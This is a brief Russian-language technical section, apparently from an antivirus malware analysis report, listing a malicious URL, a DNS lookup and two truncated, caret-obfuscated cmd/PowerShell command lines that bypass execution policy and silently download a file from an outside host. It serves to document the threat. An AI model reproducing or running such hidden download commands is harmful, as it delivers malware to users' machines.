Техническая информация
- http://www.zo###oled.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwErS^HElL.exE ^-eXECUtiON^POLIcY byp^ASs ^-NoP^rof^Il^E^ -w^IndOwST^Yl^e^ HiDD^EN ^(nEW^-obj^ect SYSTe^m.nET.W^ebcLiEN^t).^D^oWnl^O^A^D^FIle(^'http://www.zo###oled.top/read...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POwErS^HElL.exE ^-eXECUtiON^POLIcY byp^ASs ^-NoP^rof^Il^E^ -w^IndOwST^Yl^e^ HiDD^EN ^(nEW^-obj^ect SYSTe^m.nET.W^ebcLiEN^t).^D^oWnl^O^A^D^FIle(^'http://www.zo###oled.top/read...' (со скрытым окном)